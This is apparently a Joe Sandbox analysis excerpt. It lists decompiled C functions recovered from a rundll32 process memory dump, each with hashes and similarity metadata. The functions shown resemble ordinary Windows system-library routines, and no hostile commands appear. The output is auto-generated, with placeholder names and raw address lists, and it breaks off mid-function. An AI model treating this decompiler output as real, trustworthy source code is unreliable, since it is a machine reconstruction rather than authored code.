                                                                                            						_push(_t57);
                                                                                            						_push(0xa0);
                                                                                            						_push(_t57);
                                                                                            						_push(0xf);
                                                                                            						_t42 = E0461B0B0();
                                                                                            						if(_t42 != 0xc0000023) {
                                                                                            							break;
                                                                                            						}
                                                                                            						if(_v177 != 0) {
                                                                                            							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                                                            						}
                                                                                            						_v177 = 1;
                                                                                            						_t44 = L045F4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                                                                            						_t59 = _v184;
                                                                                            						_t57 = _t44;
                                                                                            						if(_t57 != 0) {
                                                                                            							continue;
                                                                                            						} else {
                                                                                            							_t42 = 0xc0000017;
                                                                                            							break;
                                                                                            						}
                                                                                            					}
                                                                                            					if(_t42 != 0) {
                                                                                            						_t65 = E045DCCC0(_t42);
                                                                                            						if(_t65 != 0) {
                                                                                            							L10:
                                                                                            							if(_v177 != 0) {
                                                                                            								if(_t57 != 0) {
                                                                                            									L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                                                            								}
                                                                                            							}
                                                                                            							_t46 = _t65;
                                                                                            							L12:
                                                                                            							return E0461B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                                                                            						}
                                                                                            						L7:
                                                                                            						_t50 = _a4;
                                                                                            						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                                                                            						if(_t50 != 3) {
                                                                                            							if(_t50 == 2) {
                                                                                            								goto L8;
                                                                                            							}
                                                                                            							L9:
                                                                                            							if(E0461F380(_t67 + 0xc, 0x45b5138, 0x10) == 0) {
                                                                                            								 *0x46c60d8 = _t67;
                                                                                            							}
                                                                                            							goto L10;
                                                                                            						}
                                                                                            						L8:
                                                                                            						_t64 = _t57 + 0x28;
                                                                                            						E04604F49(_t67, _t57 + 0x28);
                                                                                            						goto L9;
                                                                                            					}
                                                                                            					_t65 = 0;
                                                                                            					goto L7;
                                                                                            				}
                                                                                            				if(E04604E70(0x46c86b0, 0x4605690, 0, 0) != 0) {
                                                                                            					_t46 = E045DCCC0(_t56);
                                                                                            					goto L12;
                                                                                            				} else {
                                                                                            					_t59 = 0xa0;
                                                                                            					goto L3;
                                                                                            				}
                                                                                            			}





















                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 68f8833f00f1eb7105e76d524f309e9be568c08831a1f775b6beec58f4124ed5
                                                                                            • Instruction ID: 53601140412a556795975c1fd70bbfd06a7ed8238716d4d218404109e64a954b
                                                                                            • Opcode Fuzzy Hash: 68f8833f00f1eb7105e76d524f309e9be568c08831a1f775b6beec58f4124ed5
                                                                                            • Instruction Fuzzy Hash: 1141B071A40318AFEB35DF14CD80BABB7A9EB55714F04809AEA4597390FB74FD40CA91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 85%
                                                                                            			E04604BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                                                                            				signed int _v8;
                                                                                            				short _v20;
                                                                                            				intOrPtr _v24;
                                                                                            				intOrPtr _v28;
                                                                                            				intOrPtr _v32;
                                                                                            				char _v36;
                                                                                            				char _v156;
                                                                                            				short _v158;
                                                                                            				intOrPtr _v160;
                                                                                            				char _v164;
                                                                                            				intOrPtr _v168;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				signed int _t45;
                                                                                            				intOrPtr _t74;
                                                                                            				signed char _t77;
                                                                                            				intOrPtr _t84;
                                                                                            				char* _t85;
                                                                                            				void* _t86;
                                                                                            				intOrPtr _t87;
                                                                                            				signed short _t88;
                                                                                            				signed int _t89;
                                                                                            
                                                                                            				_t83 = __edx;
                                                                                            				_v8 =  *0x46cd360 ^ _t89;
                                                                                            				_t45 = _a8 & 0x0000ffff;
                                                                                            				_v158 = __edx;
                                                                                            				_v168 = __ecx;
                                                                                            				if(_t45 == 0) {
                                                                                            					L22:
                                                                                            					_t86 = 6;
                                                                                            					L12:
                                                                                            					E045DCC50(_t86);
                                                                                            					L11:
                                                                                            					return E0461B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                                                                            				}
                                                                                            				_t77 = _a4;
                                                                                            				if((_t77 & 0x00000001) != 0) {
                                                                                            					goto L22;
                                                                                            				}
                                                                                            				_t8 = _t77 + 0x34; // 0xdce0ba00
                                                                                            				if(_t45 !=  *_t8) {
                                                                                            					goto L22;
                                                                                            				}
                                                                                            				_t9 = _t77 + 0x24; // 0x46c8504
                                                                                            				E045F2280(_t9, _t9);
                                                                                            				_t87 = 0x78;
                                                                                            				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                                                                            				E0461FA60( &_v156, 0, _t87);
                                                                                            				_t13 = _t77 + 0x30; // 0x3db8
                                                                                            				_t85 =  &_v156;
                                                                                            				_v36 =  *_t13;
                                                                                            				_v28 = _v168;
                                                                                            				_v32 = 0;
                                                                                            				_v24 = 0;
                                                                                            				_v20 = _v158;
                                                                                            				_v160 = 0;
                                                                                            				while(1) {
                                                                                            					_push( &_v164);
                                                                                            					_push(_t87);
                                                                                            					_push(_t85);
                                                                                            					_push(0x18);
                                                                                            					_push( &_v36);
                                                                                            					_push(0x1e);
                                                                                            					_t88 = E0461B0B0();
                                                                                            					if(_t88 != 0xc0000023) {
                                                                                            						break;
                                                                                            					}
                                                                                            					if(_t85 !=  &_v156) {
                                                                                            						L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                                                                            					}
                                                                                            					_t84 = L045F4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                                                                            					_v168 = _v164;
                                                                                            					if(_t84 == 0) {
                                                                                            						_t88 = 0xc0000017;
                                                                                            						goto L19;
                                                                                            					} else {
                                                                                            						_t74 = _v160 + 1;
                                                                                            						_v160 = _t74;
                                                                                            						if(_t74 >= 0x10) {
                                                                                            							L19:
                                                                                            							_t86 = E045DCCC0(_t88);
                                                                                            							if(_t86 != 0) {
                                                                                            								L8:
                                                                                            								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                                                                            								_t30 = _t77 + 0x24; // 0x46c8504
                                                                                            								E045EFFB0(_t77, _t84, _t30);
                                                                                            								if(_t84 != 0 && _t84 !=  &_v156) {
                                                                                            									L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                                                                            								}
                                                                                            								if(_t86 != 0) {
                                                                                            									goto L12;
                                                                                            								} else {
                                                                                            									goto L11;
                                                                                            								}
                                                                                            							}
                                                                                            							L6:
                                                                                            							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                                                                            							if(_v164 != 0) {
                                                                                            								_t83 = _t84;
                                                                                            								E04604F49(_t77, _t84);
                                                                                            							}
                                                                                            							goto L8;
                                                                                            						}
                                                                                            						_t87 = _v168;
                                                                                            						continue;
                                                                                            					}
                                                                                            				}
                                                                                            				if(_t88 != 0) {
                                                                                            					goto L19;
                                                                                            				}
                                                                                            				goto L6;
                                                                                            			}



























                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ace958f7730f8331495a81b005008a9403a7edd43394da1e5d6a0bf429e838d7
                                                                                            • Instruction ID: 1addb17e9340ef47eeb9d2f495265e57fc899a37387fc102eb5ee2d4c32474f9
                                                                                            • Opcode Fuzzy Hash: ace958f7730f8331495a81b005008a9403a7edd43394da1e5d6a0bf429e838d7
                                                                                            • Instruction Fuzzy Hash: 1D41A475A002289BDF35DF64C940BEA77B4FF85710F0145A5EA08AB350EB78BE81CB95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 94%
                                                                                            			E045E8A0A(intOrPtr* __ecx, signed int __edx) {
                                                                                            				signed int _v8;
                                                                                            				char _v524;
                                                                                            				signed int _v528;
                                                                                            				void* _v532;
                                                                                            				char _v536;
                                                                                            				char _v540;
                                                                                            				char _v544;
                                                                                            				intOrPtr* _v548;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				signed int _t44;
                                                                                            				void* _t46;
                                                                                            				void* _t48;
                                                                                            				signed int _t53;
                                                                                            				signed int _t55;
                                                                                            				intOrPtr* _t62;
                                                                                            				void* _t63;
                                                                                            				unsigned int _t75;
                                                                                            				signed int _t79;
                                                                                            				unsigned int _t81;
                                                                                            				unsigned int _t83;
                                                                                            				signed int _t84;
                                                                                            				void* _t87;
                                                                                            
                                                                                            				_t76 = __edx;
                                                                                            				_v8 =  *0x46cd360 ^ _t84;
                                                                                            				_v536 = 0x200;
                                                                                            				_t79 = 0;
                                                                                            				_v548 = __edx;
                                                                                            				_v544 = 0;
                                                                                            				_t62 = __ecx;
                                                                                            				_v540 = 0;
                                                                                            				_v532 =  &_v524;
                                                                                            				if(__edx == 0 || __ecx == 0) {
                                                                                            					L6:
                                                                                            					return E0461B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                                                                            				} else {
                                                                                            					_v528 = 0;
                                                                                            					E045EE9C0(1, __ecx, 0, 0,  &_v528);
                                                                                            					_t44 = _v528;
                                                                                            					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                                                                            					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                                                                            					_t46 = 0xa;
                                                                                            					_t87 = _t81 - _t46;
                                                                                            					if(_t87 > 0 || _t87 == 0) {
                                                                                            						 *_v548 = 0x45b1180;
                                                                                            						L5:
                                                                                            						_t79 = 1;
                                                                                            						goto L6;
                                                                                            					} else {
                                                                                            						_t48 = E04601DB5(_t62,  &_v532,  &_v536);
                                                                                            						_t76 = _v528;
                                                                                            						if(_t48 == 0) {
                                                                                            							L9:
                                                                                            							E04613C2A(_t81, _t76,  &_v544);
                                                                                            							 *_v548 = _v544;
                                                                                            							goto L5;
                                                                                            						}
                                                                                            						_t62 = _v532;
                                                                                            						if(_t62 != 0) {
                                                                                            							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                                                                            							_t53 =  *_t62;
                                                                                            							_v528 = _t53;
                                                                                            							if(_t53 != 0) {
                                                                                            								_t63 = _t62 + 4;
                                                                                            								_t55 = _v528;
                                                                                            								do {
                                                                                            									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                                                                            										if(E045E8999(_t63,  &_v540) == 0) {
                                                                                            											_t55 = _v528;
                                                                                            										} else {
                                                                                            											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                                                                            											_t55 = _v528;
                                                                                            											if(_t75 >= _t83) {
                                                                                            												_t83 = _t75;
                                                                                            											}
                                                                                            										}
                                                                                            									}
                                                                                            									_t63 = _t63 + 0x14;
                                                                                            									_t55 = _t55 - 1;
                                                                                            									_v528 = _t55;
                                                                                            								} while (_t55 != 0);
                                                                                            								_t62 = _v532;
                                                                                            							}
                                                                                            							if(_t62 !=  &_v524) {
                                                                                            								L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                                                                            							}
                                                                                            							_t76 = _t83 & 0x0000ffff;
                                                                                            							_t81 = _t83 >> 0x10;
                                                                                            						}
                                                                                            						goto L9;
                                                                                            					}
                                                                                            				}
                                                                                            			}




























                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 88f97dcb98e6fe21462420d4d6c67c95445b552a4be4d8ab0b78c90ba8e9dab1
                                                                                            • Instruction ID: 2d39d63663ff01ef36f545fadeaecabd23e8853029a6774ffef4477289044bc0
                                                                                            • Opcode Fuzzy Hash: 88f97dcb98e6fe21462420d4d6c67c95445b552a4be4d8ab0b78c90ba8e9dab1
                                                                                            • Instruction Fuzzy Hash: 224151B1A402289BDB28EF56D888AB9B3F8FF44314F1045E9D919D7251E770AE84EF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 69%
                                                                                            			E046569A6(signed short* __ecx, void* __eflags) {
                                                                                            				signed int _v8;
                                                                                            				signed int _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				signed int _v24;
                                                                                            				signed short _v28;
                                                                                            				signed int _v32;
                                                                                            				intOrPtr _v36;
                                                                                            				signed int _v40;
                                                                                            				char* _v44;
                                                                                            				signed int _v48;
                                                                                            				intOrPtr _v52;
                                                                                            				signed int _v56;
                                                                                            				char _v60;
                                                                                            				signed int _v64;
                                                                                            				char _v68;
                                                                                            				char _v72;
                                                                                            				signed short* _v76;
                                                                                            				signed int _v80;
                                                                                            				char _v84;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				void* _t68;
                                                                                            				intOrPtr _t73;
                                                                                            				signed short* _t74;
                                                                                            				void* _t77;
                                                                                            				void* _t78;
                                                                                            				signed int _t79;
                                                                                            				signed int _t80;
                                                                                            
                                                                                            				_v8 =  *0x46cd360 ^ _t80;
                                                                                            				_t75 = 0x100;
                                                                                            				_v64 = _v64 & 0x00000000;
                                                                                            				_v76 = __ecx;
                                                                                            				_t79 = 0;
                                                                                            				_t68 = 0;
                                                                                            				_v72 = 1;
                                                                                            				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                                                                            				_t77 = 0;
                                                                                            				if(L045E6C59(__ecx[2], 0x100, __eflags) != 0) {
                                                                                            					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                                                            					if(_t79 != 0 && E04656BA3() != 0) {
                                                                                            						_push(0);
                                                                                            						_push(0);
                                                                                            						_push(0);
                                                                                            						_push(0x1f0003);
                                                                                            						_push( &_v64);
                                                                                            						if(E04619980() >= 0) {
                                                                                            							E045F2280(_t56, 0x46c8778);
                                                                                            							_t77 = 1;
                                                                                            							_t68 = 1;
                                                                                            							if( *0x46c8774 == 0) {
                                                                                            								asm("cdq");
                                                                                            								 *(_t79 + 0xf70) = _v64;
                                                                                            								 *(_t79 + 0xf74) = 0x100;
                                                                                            								_t75 = 0;
                                                                                            								_t73 = 4;
                                                                                            								_v60 =  &_v68;
                                                                                            								_v52 = _t73;
                                                                                            								_v36 = _t73;
                                                                                            								_t74 = _v76;
                                                                                            								_v44 =  &_v72;
                                                                                            								 *0x46c8774 = 1;
                                                                                            								_v56 = 0;
                                                                                            								_v28 = _t74[2];
                                                                                            								_v48 = 0;
                                                                                            								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                                                                            								_v40 = 0;
                                                                                            								_v32 = 0;
                                                                                            								_v24 = 0;
                                                                                            								_v16 = 0;
                                                                                            								if(E045DB6F0(0x45bc338, 0x45bc288, 3,  &_v60) == 0) {
                                                                                            									_v80 = _v80 | 0xffffffff;
                                                                                            									_push( &_v84);
                                                                                            									_push(0);
                                                                                            									_push(_v64);
                                                                                            									_v84 = 0xfa0a1f00;
                                                                                            									E04619520();
                                                                                            								}
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            				}
                                                                                            				if(_v64 != 0) {
                                                                                            					_push(_v64);
                                                                                            					E046195D0();
                                                                                            					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                                                                            					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                                                                            				}
                                                                                            				if(_t77 != 0) {
                                                                                            					E045EFFB0(_t68, _t77, 0x46c8778);
                                                                                            				}
                                                                                            				_pop(_t78);
                                                                                            				return E0461B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                                                                            			}

































                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 724e886cf511c624002fc0f002377a1791dbd24dcd57e02e1d1edb217f4929e7
                                                                                            • Instruction ID: 632698aa3a03340c770644892d2906ff4dc9320fd915591d2f54215fbfe8f35f
                                                                                            • Opcode Fuzzy Hash: 724e886cf511c624002fc0f002377a1791dbd24dcd57e02e1d1edb217f4929e7
                                                                                            • Instruction Fuzzy Hash: 1D416AB1D00208AFEB25DFA5D940BFEBBF4FF48714F14812AE919A7250EB74A905CB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 85%
                                                                                            			E045D5210(intOrPtr _a4, void* _a8) {
                                                                                            				void* __ecx;
                                                                                            				intOrPtr _t31;
                                                                                            				signed int _t32;
                                                                                            				signed int _t33;
                                                                                            				intOrPtr _t35;
                                                                                            				signed int _t52;
                                                                                            				void* _t54;
                                                                                            				void* _t56;
                                                                                            				unsigned int _t59;
                                                                                            				signed int _t60;
                                                                                            				void* _t61;
                                                                                            
                                                                                            				_t61 = E045D52A5(1);
                                                                                            				if(_t61 == 0) {
                                                                                            					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                                            					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                                                                            					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                                                                            				} else {
                                                                                            					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                                                                            					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                                                                            				}
                                                                                            				_t60 = _t59 >> 1;
                                                                                            				_t32 = 0x3a;
                                                                                            				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                                                                            					_t52 = _t60 + _t60;
                                                                                            					if(_a4 > _t52) {
                                                                                            						goto L5;
                                                                                            					}
                                                                                            					if(_t61 != 0) {
                                                                                            						asm("lock xadd [esi], eax");
                                                                                            						if((_t32 | 0xffffffff) == 0) {
                                                                                            							_push( *((intOrPtr*)(_t61 + 4)));
                                                                                            							E046195D0();
                                                                                            							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                                            						}
                                                                                            					} else {
                                                                                            						E045EEB70(_t54, 0x46c79a0);
                                                                                            					}
                                                                                            					_t26 = _t52 + 2; // 0xddeeddf0
                                                                                            					return _t26;
                                                                                            				} else {
                                                                                            					_t52 = _t60 + _t60;
                                                                                            					if(_a4 < _t52) {
                                                                                            						if(_t61 != 0) {
                                                                                            							asm("lock xadd [esi], eax");
                                                                                            							if((_t32 | 0xffffffff) == 0) {
                                                                                            								_push( *((intOrPtr*)(_t61 + 4)));
                                                                                            								E046195D0();
                                                                                            								L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                                            							}
                                                                                            						} else {
                                                                                            							E045EEB70(_t54, 0x46c79a0);
                                                                                            						}
                                                                                            						return _t52;
                                                                                            					}
                                                                                            					L5:
                                                                                            					_t33 = E0461F3E0(_a8, _t54, _t52);
                                                                                            					if(_t61 == 0) {
                                                                                            						E045EEB70(_t54, 0x46c79a0);
                                                                                            					} else {
                                                                                            						asm("lock xadd [esi], eax");
                                                                                            						if((_t33 | 0xffffffff) == 0) {
                                                                                            							_push( *((intOrPtr*)(_t61 + 4)));
                                                                                            							E046195D0();
                                                                                            							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                                            						}
                                                                                            					}
                                                                                            					_t35 = _a8;
                                                                                            					if(_t60 <= 1) {
                                                                                            						L9:
                                                                                            						_t60 = _t60 - 1;
                                                                                            						 *((short*)(_t52 + _t35 - 2)) = 0;
                                                                                            						goto L10;
                                                                                            					} else {
                                                                                            						_t56 = 0x3a;
                                                                                            						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                                                                            							 *((short*)(_t52 + _t35)) = 0;
                                                                                            							L10:
                                                                                            							return _t60 + _t60;
                                                                                            						}
                                                                                            						goto L9;
                                                                                            					}
                                                                                            				}
                                                                                            			}















                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cfd927bdf219f8202956c44beb20fefb26be89a5c6498292fa5e4098d93d9407
                                                                                            • Instruction ID: 8b82be336a4a68d22c8b764b129dc2ecf62cd4249c42b9b966c97b83c0b8165c
                                                                                            • Opcode Fuzzy Hash: cfd927bdf219f8202956c44beb20fefb26be89a5c6498292fa5e4098d93d9407
                                                                                            • Instruction Fuzzy Hash: BE312631651645EBD7359F28CC81B7A77E5FF50765F104A1AE4160B2A4FB30F808EAD0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E04613D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                            				intOrPtr _v8;
                                                                                            				char _v12;
                                                                                            				signed short** _t33;
                                                                                            				short* _t38;
                                                                                            				intOrPtr* _t39;
                                                                                            				intOrPtr* _t41;
                                                                                            				signed short _t43;
                                                                                            				intOrPtr* _t47;
                                                                                            				intOrPtr* _t53;
                                                                                            				signed short _t57;
                                                                                            				intOrPtr _t58;
                                                                                            				signed short _t60;
                                                                                            				signed short* _t61;
                                                                                            
                                                                                            				_t47 = __ecx;
                                                                                            				_t61 = __edx;
                                                                                            				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                                                                            				if(_t60 > 0xfffe) {
                                                                                            					L22:
                                                                                            					return 0xc0000106;
                                                                                            				}
                                                                                            				if(__edx != 0) {
                                                                                            					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                                                                            						L5:
                                                                                            						E045E7B60(0, _t61, 0x45b11c4);
                                                                                            						_v12 =  *_t47;
                                                                                            						_v12 = _v12 + 0xfff8;
                                                                                            						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                                                                            						E045E7B60(0xfff8, _t61,  &_v12);
                                                                                            						_t33 = _a8;
                                                                                            						if(_t33 != 0) {
                                                                                            							 *_t33 = _t61;
                                                                                            						}
                                                                                            						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                            						_t53 = _a12;
                                                                                            						if(_t53 != 0) {
                                                                                            							_t57 = _t61[2];
                                                                                            							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                                                                            							while(_t38 >= _t57) {
                                                                                            								if( *_t38 == 0x5c) {
                                                                                            									_t41 = _t38 + 2;
                                                                                            									if(_t41 == 0) {
                                                                                            										break;
                                                                                            									}
                                                                                            									_t58 = 0;
                                                                                            									if( *_t41 == 0) {
                                                                                            										L19:
                                                                                            										 *_t53 = _t58;
                                                                                            										goto L7;
                                                                                            									}
                                                                                            									 *_t53 = _t41;
                                                                                            									goto L7;
                                                                                            								}
                                                                                            								_t38 = _t38 - 2;
                                                                                            							}
                                                                                            							_t58 = 0;
                                                                                            							goto L19;
                                                                                            						} else {
                                                                                            							L7:
                                                                                            							_t39 = _a16;
                                                                                            							if(_t39 != 0) {
                                                                                            								 *_t39 = 0;
                                                                                            								 *((intOrPtr*)(_t39 + 4)) = 0;
                                                                                            								 *((intOrPtr*)(_t39 + 8)) = 0;
                                                                                            								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                                                                            							}
                                                                                            							return 0;
                                                                                            						}
                                                                                            					}
                                                                                            					_t61 = _a4;
                                                                                            					if(_t61 != 0) {
                                                                                            						L3:
                                                                                            						_t43 = L045F4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                                                                            						_t61[2] = _t43;
                                                                                            						if(_t43 == 0) {
                                                                                            							return 0xc0000017;
                                                                                            						}
                                                                                            						_t61[1] = _t60;
                                                                                            						 *_t61 = 0;
                                                                                            						goto L5;
                                                                                            					}
                                                                                            					goto L22;
                                                                                            				}
                                                                                            				_t61 = _a4;
                                                                                            				if(_t61 == 0) {
                                                                                            					return 0xc000000d;
                                                                                            				}
                                                                                            				goto L3;
                                                                                            			}
















                                                                                            0x04613de9
                                                                                            0x04613de9
                                                                                            0x04613dee
                                                                                            0x04613dfd
                                                                                            0x04613dff
                                                                                            0x04613e02
                                                                                            0x04613e05
                                                                                            0x04613e05
                                                                                            0x00000000
                                                                                            0x04613df0
                                                                                            0x04613de7
                                                                                            0x0464e78f
                                                                                            0x0464e794
                                                                                            0x04613d79
                                                                                            0x04613d84
                                                                                            0x04613d89
                                                                                            0x04613d8e
                                                                                            0x00000000
                                                                                            0x0464e7a4
                                                                                            0x04613d96
                                                                                            0x04613d9a
                                                                                            0x00000000
                                                                                            0x04613d9a
                                                                                            0x00000000
                                                                                            0x0464e794
                                                                                            0x04613d6e
                                                                                            0x04613d73
                                                                                            0x00000000
                                                                                            0x0464e7b5
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c9ddc0c5d3effe29cc5ffdf17b067ff257ca2d78ca1990017b7631a953e8166d
                                                                                            • Instruction ID: 627be7d51d8f018e0b34d5f21f25846983086c264ce3f5d5c6523aba48bcef6d
                                                                                            • Opcode Fuzzy Hash: c9ddc0c5d3effe29cc5ffdf17b067ff257ca2d78ca1990017b7631a953e8166d
                                                                                            • Instruction Fuzzy Hash: B4318331B05615DBEB248F29D481A7AB7A5FF95710B09806AE846CB360F630E881D790
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 78%
                                                                                            			E0460A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                            				intOrPtr _t35;
                                                                                            				intOrPtr _t39;
                                                                                            				intOrPtr _t45;
                                                                                            				intOrPtr* _t51;
                                                                                            				intOrPtr* _t52;
                                                                                            				intOrPtr* _t55;
                                                                                            				signed int _t57;
                                                                                            				intOrPtr* _t59;
                                                                                            				intOrPtr _t68;
                                                                                            				intOrPtr* _t77;
                                                                                            				void* _t79;
                                                                                            				signed int _t80;
                                                                                            				intOrPtr _t81;
                                                                                            				char* _t82;
                                                                                            				void* _t83;
                                                                                            
                                                                                            				_push(0x24);
                                                                                            				_push(0x46b0220);
                                                                                            				E0462D08C(__ebx, __edi, __esi);
                                                                                            				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                                                                            				_t79 = __ecx;
                                                                                            				_t35 =  *0x46c7b9c; // 0x0
                                                                                            				_t55 = L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                                                                            				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                                                                            				if(_t55 == 0) {
                                                                                            					_t39 = 0xc0000017;
                                                                                            					L11:
                                                                                            					return E0462D0D1(_t39);
                                                                                            				}
